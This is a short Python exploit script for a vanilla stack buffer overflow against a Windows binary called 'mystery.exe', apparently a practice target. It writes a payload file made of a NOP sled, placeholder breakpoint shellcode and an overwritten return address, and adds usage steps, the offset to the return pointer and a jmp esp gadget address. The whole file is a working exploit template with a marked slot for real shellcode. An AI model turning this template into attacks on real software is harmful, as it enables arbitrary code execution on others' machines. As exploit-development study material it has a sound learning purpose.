exploit_mystery.py

# Name : Abhinav Thakur
# Email: compilepeace@gmail.com
# Description:	This exploit code makes a binary file at "C:\hellothere.bin" which contains malacious
# 				data which when executed by the binary 'mystery.exe' will result into arbitrary code
#				execution. A vanilla stack overflow exploit.

# Usage : Type the following commands while in directory of 'mystery.exe'
#			> python exploit_mystery.py
#			> mystery A B

# Usefull information
# 0012fb68 : address of input buffer 
# 0012ff74 : address of return pointer
# offset to return pointer = 1036 bytes
# ff e4 : jmp esp : exists at 7c941eed in ntdll


import struct


# Place your shellcode here
shellcode = ("\xcc\xcc\xcc\xcc")


payload = "\x90" * (1036 - len(shellcode))
payload += shellcode
payload += struct.pack("I", 0x12fb80)


# Creating the malacious binary "C:\hellothere.bin"
fo = open("C:\hellothere.bin", 'w')
fo.write(payload)
fo.close()